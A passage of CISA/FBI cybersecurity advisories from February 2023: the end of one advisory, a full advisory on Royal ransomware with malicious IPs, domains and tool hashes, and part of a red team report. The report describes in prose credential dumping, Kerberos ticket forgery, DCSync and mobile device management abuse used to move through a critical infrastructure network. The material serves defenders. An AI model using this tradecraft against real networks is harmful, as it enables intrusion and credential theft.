Maintain a robust asset management policy through comprehensive documentation of assets, tracking current version information to maintain awareness of outdated software, and mapping assets to business and critical functions.
- Determine the need and functionality of assets that require public internet exposure. [CPG 2.3]

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA, FBI, and MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and co-sealers recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

Select an ATT&CK technique described in this advisory (see Table 4).
Align your security technologies against the selected technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies’ performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program—including people, processes, and technologies—based on the data generated by this process.

CISA, FBI, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

UNIX Timestamp Converter

REFERENCES

[1] Telerik: Exploiting .NET JavaScriptSerializer Deserialization (CVE-2019-18935)
[2] ACSC Advisory 2020-004
[3] Bishop Fox CVE-2019-18935: Remote Code Execution via Insecure Deserialization in Telerik UI
[4] Volexity Threat Research: XE Group
[5] GitHub: Proof-of-Concept Exploit for CVE-2019-18935
[6] Microsoft: Configure Logging in IIS
[7] GitHub: CVE-2019-18935

ACKNOWLEDGEMENTS

Google’s Threat Analysis Group (TAG) contributed to this CSA.

Please share your thoughts. We recently updated our anonymous Product Feedback Survey and we'd welcome your feedback.

#StopRansomware: Royal Ransomware

CISA — Fri, 24 Feb 2023 12:30:43 EST

SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

Actions to take today to mitigate cyber threats from ransomware:

Prioritize remediating known exploited vulnerabilities.
Train users to recognize and report phishing attempts.
Enable and enforce multifactor authentication.

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known Royal ransomware IOCs and TTPs identified through FBI threat response activities as recently as January 2023.

Since approximately September 2022, cyber criminals have compromised U.S. and international organizations with a Royal ransomware variant. FBI and CISA believe this variant, which uses its own custom-made file encryption program, evolved from earlier iterations that used “Zeon” as a loader. After gaining access to victims’ networks, Royal actors disable antivirus software and exfiltrate large amounts of data before ultimately deploying the ransomware and encrypting the systems. Royal actors have made ransom demands ranging from approximately $1 million to $11 million USD in Bitcoin. In observed incidents, Royal actors do not include ransom amounts and payment instructions as part of the initial ransom note. Instead, the note, which appears after encryption, requires victims to directly interact with the threat actor via a .onion URL (reachable through the Tor browser). Royal actors have targeted numerous critical infrastructure sectors including, but not limited to, Manufacturing, Communications, Healthcare and Public Healthcare (HPH), and Education.

FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.

Download the PDF version of this report:

#StopRansomware: Royal Ransomware (PDF, 586.96 KB )

For a downloadable copy of IOCs, see

AA23-061A STIX XML (XML, 114.26 KB )

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.

Royal ransomware uses a unique partial encryption approach that allows the threat actor to choose a specific percentage of data in a file to encrypt. This approach allows the actor to lower the encryption percentage for larger files, which helps evade detection.[1] In addition to encrypting files, Royal actors also engage in double extortion tactics in which they threaten to publicly release the encrypted data if the victim does not pay the ransom.

Initial Access

Royal actors gain initial access to victim networks in a number of ways including:

Phishing. According to third-party reporting, Royal actors most commonly (in 66.7% of incidents) gain initial access to victim networks via successful phishing emails [T1566].
- According to open-source reporting, victims have unknowingly installed malware that delivers Royal ransomware after receiving phishing emails containing malicious PDF documents [T1566.001], and malvertising [T1566.002].[2]
Remote Desktop Protocol (RDP). The second most common vector Royal actors use (in 13.3% of incidents) for initial access is RDP compromise.
Public-facing applications. FBI has also observed Royal actors gain initial access through exploiting public-facing applications [T1190].
Brokers. Reports from trusted third-party sources indicate that Royal actors may leverage brokers to gain initial access and source traffic by harvesting virtual private network (VPN) credentials from stealer logs.

Command and Control

Once Royal actors gain access to the network, they communicate with command and control (C2) infrastructure and download multiple tools [T1105]. Legitimate Windows software is repurposed by Royal operators to strengthen their foothold in the victim’s network. Ransomware operators often use open-source projects to aid their intrusion activities; Royal operators have recently been observed using Chisel, a tunneling tool transported over HTTP and secured via SSH [T1572], to communicate with their C2 infrastructure. FBI has observed multiple Qakbot C2s used in Royal ransomware attacks, but has not yet determined if Royal ransomware exclusively uses Qakbot C2s.

Lateral Movement and Persistence

Royal actors often use RDP to move laterally across the network [T1021.001]. Microsoft Sysinternals tool PsExec has also been used to aid lateral movement. FBI has observed Royal actors using remote monitoring and management (RMM) software, such as AnyDesk, LogMeIn, and Atera, for persistence in the victim’s network [T1133]. In some instances, the actors moved laterally to the domain controller. In one confirmed case, the actors used a legitimate admin account to remotely log on to the domain controller [T1078]. Once on the domain controller, the threat actor deactivated antivirus protocols [T1562.001] by modifying Group Policy Objects [T1484.001].

Exfiltration

Royal actors exfiltrate data from victim networks by repurposing legitimate cyber pentesting tools, such as Cobalt Strike, and malware tools and derivatives, such as Ursnif/Gozi, for data aggregation and exfiltration. According to third-party reporting, Royal actors’ first hop in exfiltration and other operations is usually a U.S. IP address.

Note: In reference to Cobalt Strike and other tools mentioned above, a tool repository used by Royal was identified at IP: 94.232.41[.]105 in December 2022.

Encryption

Before starting the encryption process, Royal actors:

Use Windows Restart Manager to determine whether targeted files are currently in use or blocked by other applications [T1486].[1]
Use Windows Volume Shadow Copy service (vssadmin.exe) to delete shadow copies to prevent system recovery.[1]

FBI has found numerous batch (.bat) files on impacted systems which are typically transferred as an encrypted 7zip file. Batch files create a new admin user [T1078.002], force a group policy update, set pertinent registry keys to auto-extract [T1119] and execute the ransomware, monitor the encryption process, and delete files upon completion—including Application, System, and Security event logs [T1070.001].

Malicious files have been found in victim networks in the following directories:

C:\Temp\
C:\Users\<user>\AppData\Roaming\
C:\Users\<users>\
C:\ProgramData\

Indicators of Compromise (IOC)

See table 1 and 2 for Royal ransomware IOCs that FBI obtained during threat response activities as of January 2023. Note: Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.

*Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023*
IOC	Description
.royal	Encrypted file extension
README.TXT	Ransom note
Malicious IP	Last Activity
102.157.44[.]105	November 2022
105.158.118[.]241	November 2022
105.69.155[.]85	November 2022
113.169.187[.]159	November 2022
134.35.9[.]209	November 2022
139.195.43[.]166	November 2022
139.60.161[.]213	November 2022
148.213.109[.]165	November 2022
163.182.177[.]80	November 2022
181.141.3[.]126	November 2022
181.164.194[.]228	November 2022
185.143.223[.]69	November 2022
186.64.67[.]6	November 2022
186.86.212[.]138	November 2022
190.193.180[.]228	November 2022
196.70.77[.]11	November 2022
197.11.134[.]255	November 2022
197.158.89[.]85	November 2022
197.204.247[.]7	November 2022
197.207.181[.]147	November 2022
197.207.218[.]27	November 2022
197.94.67[.]207	November 2022
23.111.114[.]52	November 2022
41.100.55[.]97	November 2022
41.107.77[.]67	November 2022
41.109.11[.]80	November 2022
41.251.121[.]35	November 2022
41.97.65[.]51	November 2022
42.189.12[.]36	November 2022
45.227.251[.]167	November 2022
5.44.42[.]20	November 2022
61.166.221[.]46	November 2022
68.83.169[.]91	November 2022
81.184.181[.]215	November 2022
82.12.196[.]197	November 2022
98.143.70[.]147	November 2022
140.82.48[.]158	December 2022
147.135.36[.]162	December 2022
147.135.11[.]223	December 2022
152.89.247[.]50	December 2022
179.43.167[.]10	December 2022
185.7.214[.]218	December 2022
193.149.176[.]157	December 2022
193.235.146[.]104	December 2022
209.141.36[.]116	December 2022
45.61.136[.]47	December 2022
45.8.158[.]104	December 2022
5.181.234[.]58	December 2022
5.188.86[.]195	December 2022
77.73.133[.]84	December 2022
89.108.65[.]136	December 2022
94.232.41[.]105	December 2022
47.87.229[.]39	January 2023
Malicious Domain	Last Observed
ciborkumari[.]xyz	October 2022
sombrat[.]com	October 2022
gororama[.]com	November 2022
softeruplive[.]com	November 2022
altocloudzone[.]live	December 2022
ciborkumari[.]xyz	December 2022
myappearinc[.]com	December 2022
parkerpublic[.]com	December 2022
pastebin.mozilla[.]org/Z54Vudf9/raw	December 2022
tumbleproperty[.]com	December 2022
myappearinc[.]com/acquire/draft/c7lh0s5jv	January 2023

*Table 2: Tools used by Royal operators*
Tool	SHA256
AV tamper	8A983042278BC5897DBCDD54D1D7E3143F8B7EAD553B5A4713E30DEFFDA16375
TCP/UDP Tunnel over HTTP (Chisel)	8a99353662ccae117d2bb22efd8c43d7169060450be413af763e8ad7522d2451
Ursnif/Gozi	be030e685536eb38ba1fec1c90e90a4165f6641c8dc39291db1d23f4ee9fa0b1
Exfil	B8C4AEC31C134ADBDBE8AAD65D2BCB21CFE62D299696A23ADD9AA1DE082C6E20
Remote Access (AnyDesk)	4a9dde3979c2343c024c6eeeddff7639be301826dd637c006074e04a1e4e9fe7
PowerShell Toolkit Downloader	4cd00234b18e04dcd745cc81bb928c8451f6601affb5fa45f20bb11bfb5383ce
PsExec (Microsoft Sysinternals)	08c6e20b1785d4ec4e3f9956931d992377963580b4b2c6579fd9930e08882b1c
Keep Host Unlocked (Don’t Sleep)	f8cff7082a936912baf2124d42ed82403c75c87cb160553a7df862f8d81809ee
Ransomware Executable	d47d4b52e75e8cf3b11ea171163a66c06d1792227c1cf7ca49d7df60804a1681
Windows Command Line (NirCmd)	216047C048BF1DCBF031CF24BD5E0F263994A5DF60B23089E393033D17257CB5
System Management (NSudo)	19896A23D7B054625C2F6B1EE1551A0DA68AD25CDDBB24510A3B74578418E618
Batch Scripts
Filename	Hash Value
2.bat	585b05b290d241a249af93b1896a9474128da969
3.bat	41a79f83f8b00ac7a9dd06e1e225d64d95d29b1d
4.bat	a84ed0f3c46b01d66510ccc9b1fc1e07af005c60
8.bat	c96154690f60a8e1f2271242e458029014ffe30a
kl.bat	65dc04f3f75deb3b287cca3138d9d0ec36b8bea0
gp.bat	82f1f72f4b1bfd7cc8afbe6d170686b1066049bc7e5863b51aa15ccc5c841f58
r.bat	74d81ef0be02899a177d7ff6374d699b634c70275b3292dbc67e577b5f6a3f3c
runanddelete.bat	342B398647073159DFA8A7D36510171F731B760089A546E96FBB8A292791EFEE

MITRE ATT&CK TECHNIQUES

See table 3 for all referenced threat actor tactics and techniques included in this advisory.

*Table 3: Royal Actors ATT&CK Techniques for Enterprise*
Initial Access
Technique Title	ID	Use
Exploit Public Facing Application	T1190	The actors gain initial access through public-facing applications.
Phishing: Spear phishing Attachment	T1566.001	The actors gain initial access through malicious PDF attachments sent via email.
Phishing: Spearphishing Link	T1566.002	The actors gain initial access using malvertising links via emails and public-facing sites.
External Remote Services	T1133	The actors gain initial access through a variety of RMM software.
Command and Control
Technique Title	ID	Use
Ingress Tool Transfer	T1105	The actors used C2 infrastructure to download multiple tools.
Protocol Tunneling	T1572	The actors used an encrypted SSH tunnel to communicate within C2 infrastructure.
Privilege Escalation
Technique Title	ID	Use
Valid Accounts: Domain Accounts	T1078.002	The actors used encrypted files to create new admin user accounts.
Defense Evasion
Technique Title	ID	Use
Impair Defenses: Disable or Modify Tools	T1562.001	The actors deactivated antivirus protocols.
Domain Policy Modification: Group Policy Modification	T1484.001	The actors modified Group Policy Objects to subvert antivirus protocols.
Indicator Removal: Clear Windows Event Logs	T1070.001	The actors deleted shadow files and system and security logs after exfiltration.
Remote Desktop Protocol	T1021.001	The actors used valid accounts to move laterally through the domain controller using RDP.
Automated Collection	T1119	The actors used registry keys to auto-extract and collect files.
Impact
Technique Title	ID	Use
Data Encrypted for Impact	T1486	The actors encrypted data to determine which files were being used or blocked by other applications.

MITIGATIONS

FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA’s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, tactics, techniques, and procedures, and which yield goals that all organizations across critical infrastructure sectors should implement:

Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute for Standards and Technology (NIST) standards for developing and managing password policies [CPG 3.4].
- Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 1.4].
- Store passwords in hashed format using industry-recognized password managers.
- Add password user “salts” to shared login credentials.
- Avoid reusing passwords.
- Implement multiple failed login attempt account lockouts [CPG 1.1].
- Disable password hints.
- Refrain from requiring password changes more frequently than once per year. Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password patterns cyber criminals can easily decipher.
- Require administrator credentials to install software.
Require multifactor authentication [CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.
Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.
Segment networks [CPG 8.1]. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.
Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting ransomware, implement a tool that logs and reports all network traffic [CPG 5.1], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
Install, regularly update, and enable real time detection for antivirus software on all hosts.
Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 1.5].
Disable unused ports.
Consider adding an email banner to emails [CPG 8.3] received from outside your organization.
Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.
Maintain offline backups of data, and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.
Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 3.3].

RESOURCES

Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.
No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

REPORTING

FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Royal actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.

Additional details requested include: a targeted company Point of Contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, host and network based indicators.

FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, or CISA at https://www.cisa.gov/report.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.

REFERENCES

[1] Royal Rumble: Analysis of Royal Ransomware (cybereason.com)
[2] DEV-0569 finds new ways to deliver Royal ransomware, various payloads - Microsoft Security Blog
[3] 2023-01: ACSC Ransomware Profile - Royal | Cyber.gov.au

ACKNOWLEDGEMENTS

Recorded Future, Coveware, Digital Asset Redemption, Q6, and RedSense contributed to this CSA.

Please share your thoughts. We recently updated our anonymous Product Feedback Survey and we'd welcome your feedback.

CISA Red Team Shares Key Findings to Improve Monitoring and Hardening of Networks

CISA — Fri, 24 Feb 2023 14:04:05 EST

SUMMARY

The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory (CSA) detailing activity and key findings from a recent CISA red team assessment—in coordination with the assessed organization—to provide network defenders recommendations for improving their organization's cyber posture.

Actions to take today to harden your local environment:

Establish a security baseline of normal network activity; tune network and host-based appliances to detect anomalous behavior.
Conduct regular assessments to ensure appropriate procedures are created and can be followed by security staff and end users.
Enforce phishing-resistant MFA to the greatest extent possible.

In 2022, CISA conducted a red team assessment (RTA) at the request of a large critical infrastructure organization with multiple geographically separated sites. The team gained persistent access to the organization’s network, moved laterally across the organization’s multiple geographically separated sites, and eventually gained access to systems adjacent to the organization’s sensitive business systems (SBSs). Multifactor authentication (MFA) prompts prevented the team from achieving access to one SBS, and the team was unable to complete its viable plan to compromise a second SBSs within the assessment period.

Despite having a mature cyber posture, the organization did not detect the red team’s activity throughout the assessment, including when the team attempted to trigger a security response.

CISA is releasing this CSA detailing the red team’s tactics, techniques, and procedures (TTPs) and key findings to provide network defenders of critical infrastructure organizations proactive steps to reduce the threat of similar activity from malicious cyber actors. This CSA highlights the importance of collecting and monitoring logs for unusual activity as well as continuous testing and exercises to ensure your organization’s environment is not vulnerable to compromise, regardless of the maturity of its cyber posture.

CISA encourages critical infrastructure organizations to apply the recommendations in the Mitigations section of this CSA—including conduct regular testing within their security operations center—to ensure security processes and procedures are up to date, effective, and enable timely detection and mitigation of malicious activity.

Download the PDF version of this report:

CISA Red Team Shares Key Findings to Improve Monitoring and Hardening of Networks (PDF, 1.06 MB )

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See the appendix for a table of the red team’s activity mapped to MITRE ATT&CK tactics and techniques.

Introduction

CISA has authority to, upon request, provide analyses, expertise, and other technical assistance to critical infrastructure owners and operators and provide operational and timely technical assistance to Federal and non-Federal entities with respect to cybersecurity risks. (See generally 6 U.S.C. §§ 652[c][5], 659[c][6].) After receiving a request for a red team assessment (RTA) from an organization and coordinating some high-level details of the engagement with certain personnel at the organization, CISA conducted the RTA over a three-month period in 2022.

During RTAs, a CISA red team emulates cyber threat actors to assess an organization’s cyber detection and response capabilities. During Phase I, the red team attempts to gain and maintain persistent access to an organization’s enterprise network while avoiding detection and evading defenses. During Phase II, the red team attempts to trigger a security response from the organization’s people, processes, or technology.

The “victim” for this assessment was a large organization with multiple geographically separated sites throughout the United States. For this assessment, the red team’s goal during Phase I was to gain access to certain sensitive business systems (SBSs).

Phase I: Red Team Cyber Threat Activity

Overview

The organization’s network was segmented with both logical and geographical boundaries. CISA’s red team gained initial access to two organization workstations at separate sites via spearphishing emails. After gaining access and leveraging Active Directory (AD) data, the team gained persistent access to a third host via spearphishing emails. From that host, the team moved laterally to a misconfigured server, from which they compromised the domain controller (DC). They then used forged credentials to move to multiple hosts across different sites in the environment and eventually gained root access to all workstations connected to the organization’s mobile device management (MDM) server. The team used this root access to move laterally to SBS-connected workstations. However, a multifactor authentication (MFA) prompt prevented the team from achieving access to one SBS, and Phase I ended before the team could implement a seemingly viable plan to achieve access to a second SBS.

Initial Access and Active Directory Discovery

The CISA red team gained initial access [TA0001] to two workstations at geographically separated sites (Site 1 and Site 2) via spearphishing emails. The team first conducted open-source research [TA0043] to identify potential targets for spearphishing. Specifically, the team looked for email addresses [T1589.002] as well as names [T1589.003] that could be used to derive email addresses based on the team’s identification of the email naming scheme. The red team sent tailored spearphishing emails to seven targets using commercially available email platforms [T1585.002]. The team used the logging and tracking features of one of the platforms to analyze the organization’s email filtering defenses and confirm the emails had reached the target’s inbox.

The team built a rapport with some targeted individuals through emails, eventually leading these individuals to accept a virtual meeting invite. The meeting invite took them to a red team-controlled domain [T1566.002] with a button, which, when clicked, downloaded a “malicious” ISO file [T1204]. After the download, another button appeared, which, when clicked, executed the file.

Two of the seven targets responded to the phishing attempt, giving the red team access to a workstation at Site 1 (Workstation 1) and a workstation at Site 2. On Workstation 1, the team leveraged a modified SharpHound collector, ldapsearch, and command-line tool, dsquery, to query and scrape AD information, including AD users [T1087.002], computers [T1018], groups [T1069.002], access control lists (ACLs), organizational units (OU), and group policy objects (GPOs) [T1615]. Note: SharpHound is a BloodHound collector, an open-source AD reconnaissance tool. Bloodhound has multiple collectors that assist with information querying.

There were 52 hosts in the AD that had Unconstrained Delegation enabled and a lastlogon timestamp within 30 days of the query. Hosts with Unconstrained Delegation enabled store Kerberos ticket-granting tickets (TGTs) of all users that have authenticated to that host. Many of these hosts, including a Site 1 SharePoint server, were Windows Server 2012R2. The default configuration of Windows Server 2012R2 allows unprivileged users to query group membership of local administrator groups.

The red team queried parsed Bloodhound data for members of the SharePoint admin group and identified several standard user accounts with administrative access. The team initiated a second spearphishing campaign, similar to the first, to target these users. One user triggered the red team’s payload, which led to installation of a persistent beacon on the user’s workstation (Workstation 2), giving the team persistent access to Workstation 2.

Lateral Movement, Credential Access, and Persistence

The red team moved laterally [TA0008] from Workstation 2 to the Site 1 SharePoint server and had SYSTEM level access to the Site 1 SharePoint server, which had Unconstrained Delegation enabled. They used this access to obtain the cached credentials of all logged-in users—including the New Technology Local Area Network Manager (NTLM) hash for the SharePoint server account. To obtain the credentials, the team took a snapshot of lsass.exe [T1003.001] with a tool called nanodump, exported the output, and processed the output offline with Mimikatz.

The team then exploited the Unconstrained Delegation misconfiguration to steal the DC’s TGT. They ran the DFSCoerce python script (DFSCoerce.py), which prompted DC authentication to the SharePoint server using the server’s NTLM hash. The team then deployed Rubeus to capture the incoming DC TGT [T1550.002], [T1557.001]. (DFSCoerce abuses Microsoft's Distributed File System [MS-DFSNM] protocol to relay authentication against an arbitrary server.[1])

The team then used the TGT to harvest advanced encryption standard (AES)-256 hashes via DCSync [T1003.006] for the krbtgt account and several privileged accounts—including domain admins, workstation admins, and a system center configuration management (SCCM) service account (SCCM Account 1). The team used the krbtgt account hash throughout the rest of their assessment to perform golden ticket attacks [T1558.001] in which they forged legitimate TGTs. The team also used the asktgt command to impersonate accounts they had credentials for by requesting account TGTs [T1550.003].

The team first impersonated the SCCM Account 1 and moved laterally to a Site 1 SCCM distribution point (DP) server (SCCM Server 1) that had direct network access to Workstation 2. The team then moved from SCCM Server 1 to a central SCCM server (SCCM Server 2) at a third site (Site 3). Specifically, the team:

Queried the AD using Lightweight Directory Access Protocol (LDAP) for information about the network's sites and subnets [T1016]. This query revealed all organization sites and subnets broken down by classless inter-domain routing (CIDR) subnet and description.
Used LDAP queries and domain name system (DNS) requests to identify recently active hosts.
Listed existing network connections [T1049] on SCCM Server 1, which revealed an active Server Message Block (SMB) connection from SCCM Server 2.
Attempted to move laterally to the SCCM Server 2 via AppDomain hijacking, but the HTTPS beacon failed to call back.
Attempted to move laterally with an SMB beacon [T1021.002], which was successful.

The team also moved from SCCM Server 1 to a Site 1 workstation (Workstation 3) that housed an active server administrator. The team impersonated an administrative service account via a golden ticket attack (from SCCM Server 1); the account had administrative privileges on Workstation 3. The user employed a KeePass password manager that the team was able to use to obtain passwords for other internal websites, a kernel-based virtual machine (KVM) server, virtual private network (VPN) endpoints, firewalls, and another KeePass database with credentials. The server administrator relied on a password manager, which stored credentials in a database file. The red team pulled the decryption key from memory using KeeThief and used it to unlock the database [T1555.005].

At the organization’s request, the red team confirmed that SCCM Server 2 provided access to the organization’s sites because firewall rules allowed SMB traffic to SCCM servers at all other sites.

The team moved laterally from SCCM Server 2 to an SCCM DP server at Site 5 and from the SCCM Server 1 to hosts at two other sites (Sites 4 and 6). The team installed persistent beacons at each of these sites. Site 5 was broken into a private and a public subnet and only DCs were able to cross that boundary. To move between the subnets, the team moved through DCs. Specifically, the team moved from the Site 5 SCCM DP server to a public DC; and then they moved from the public DC to the private DC. The team was then able to move from the private DC to workstations in the private subnet.

The team leveraged access available from SCCM 2 to move around the organization’s network for post-exploitation activities (See Post-Exploitation Activity section).

See Figure 1 for a timeline of the red team’s initial access and lateral movement showing key access points.

Figure 1: Red Team Cyber Threat Activity: Initial Access and Lateral Movement

While traversing the network, the team varied their lateral movement techniques to evade detection and because the organization had non-uniform firewalls between the sites and within the sites (within the sites, firewalls were configured by subnet). The team’s primary methods to move between sites were AppDomainManager hijacking and dynamic-link library (DLL) hijacking [T1574.001]. In some instances, they used Windows Management Instrumentation (WMI) Event Subscriptions [T1546.003].

The team impersonated several accounts to evade detection while moving. When possible, the team remotely enumerated the local administrators group on target hosts to find a valid user account. This technique relies on anonymous SMB pipe binds [T1071], which are disabled by default starting with Windows Server 2016. In other cases, the team attempted to determine valid accounts based on group name and purpose. If the team had previously acquired the credentials, they used asktgt to impersonate the account. If the team did not have the credentials, they used the golden ticket attack to forge the account.

Post-Exploitation Activity: Gaining Access to SBSs

With persistent, deep access established across the organization’s networks and subnetworks, the red team began post-exploitation activities and attempted to access SBSs. Trusted agents of the organization tasked the team with gaining access to two specialized servers (SBS 1 and SBS 2). The team achieved root access to three SBS-adjacent workstations but was unable to move laterally to the SBS servers:

Phase I ended before the team could implement a plan to move to SBS 1.
An MFA prompt blocked the team from moving to SBS 2, and Phase I ended before they could implement potential workarounds.

However, the team assesses that by using Secure Shell (SSH) session socket files (see below), they could have accessed any hosts available to the users whose workstations were compromised.

Plan for Potential Access to SBS 1

Conducting open-source research [1591.001], the team identified that SBS 1 and 2 assets and associated management/upkeep staff were located at Sites 5 and 6, respectively. Adding previously collected AD data to this discovery, the team was able to identify a specific SBS 1 admin account. The team planned to use the organization’s mobile device management (MDM) software to move laterally to the SBS 1 administrator’s workstation and, from there, pivot to SBS 1 assets.

The team identified the organization’s MDM vendor using open-source and AD information [T1590.006] and moved laterally to an MDM distribution point server at Site 5 (MDM DP 1). This server contained backups of the MDM MySQL database on its D: drive in the Backup directory. The backups included the encryption key needed to decrypt any encrypted values, such as SSH passwords [T1552]. The database backup identified both the user of the SBS 1 administrator account (USER 2) and the user’s workstation (Workstation 4), which the MDM software remotely administered.

The team moved laterally to an MDM server (MDM 1) at Site 3, searched files on the server, and found plaintext credentials [T1552.001] to an application programming interface (API) user account stored in PowerShell scripts. The team attempted to leverage these credentials to browse to the web login page of the MDM vendor but were unable to do so because the website directed to an organization-controlled single-sign on (SSO) authentication page.

The team gained root access to workstations connected to MDM 1—specifically, the team accessed Workstation 4—by:

Selecting an MDM user from the plaintext credentials in PowerShell scripts on MDM 1.
While in the MDM MySQL database,
- Elevating the selected MDM user’s account privileges to administrator privileges, and
- Modifying the user’s account by adding Create Policy and Delete Policy permissions [T1098], [T1548].
Creating a policy via the MDM API [T1106], which instructed Workstation 4 to download and execute a payload to give the team interactive access as root to the workstation.
Verifying their interactive access.
Resetting permissions back to their original state by removing the policy via the MDM API and removing Create Policy and Delete Policy and administrator permissions and from the MDM user’s account.

While interacting with Workstation 4, the team found an open SSH socket file and a corresponding netstat connection to a host that the team identified as a bastion host from architecture documentation found on Workstation 4. The team planned to move from Workstation 4 to the bastion host to SBS 1. Note: A SSH socket file allows a user to open multiple SSH sessions through a single, already authenticated SSH connection without additional authentication.

The team could not take advantage of the open SSH socket. Instead, they searched through SBS 1 architecture diagrams and documentation on Workstation 4. They found a security operations (SecOps) network diagram detailing the network boundaries between Site 5 SecOps on-premises systems, Site 5 non-SecOps on-premises systems, and Site 5 SecOps cloud infrastructure. The documentation listed the SecOps cloud infrastructure IP ranges [T1580]. These “trusted” IP addresses were a public /16 subnet; the team was able to request a public IP in that range from the same cloud provider, and Workstation 4 made successful outbound SSH connections to this cloud infrastructure. The team intended to use that connection to reverse tunnel traffic back to the workstation and then access the bastion host via the open SSH socket file. However, Phase 1 ended before they were able to implement this plan.

Attempts to Access SBS 2

Conducting open-source research, the team identified an organizational branch [T1591] that likely had access to SBS 2. The team queried the AD to identify the branch’s users and administrators. The team gathered a list of potential accounts, from which they identified administrators, such as SYSTEMS ADMIN or DATA SYSTEMS ADMINISTRATOR, with technical roles. Using their access to the MDM MySQL database, the team queried potential targets to (1) determine the target’s last contact time with the MDM and (2) ensure any policy targeting the target’s workstation would run relatively quickly [T1596.005]. Using the same methodology as described by the steps in the Plan for Potential Access to SBS 1 section above, the team gained interactive root access to two Site 6 SBS 2-connected workstations: a software engineering workstation (Workstation 5) and a user administrator workstation (Workstation 6).

The Workstation 5 user had bash history files with what appeared to be SSH passwords mistyped into the bash prompt and saved in bash history [T1552.003]. The team then attempted to authenticate to SBS 2 using a similar tunnel setup as described in the Access to SBS 1 section above and the potential credentials from the user’s bash history file. However, this attempt was unsuccessful for unknown reasons.

On Workstation 6, the team found a .txt file containing plaintext credentials for the user. Using the pattern discovered in these credentials, the team was able to crack the user’s workstation account password [T1110.002]. The team also discovered potential passwords and SSH connection commands in the user’s bash history. Using a similar tunnel setup described above, the team attempted to log into SBS 2. However, a prompt for an MFA passcode blocked this attempt.

See figure 2 for a timeline of the team’s post exploitation activity that includes key points of access.

Figure 2: Red Team Cyber Threat Activity: Post Exploitation

Command and Control

The team used third-party owned and operated infrastructure and services [T1583] throughout their assessment, including in certain cases for command and control (C2) [TA0011]. These included:

Cobalt Strike and Merlin payloads for C2 throughout the assessment. Note: Merlin is a post-exploit tool that leverages HTTP protocols for C2 traffic.
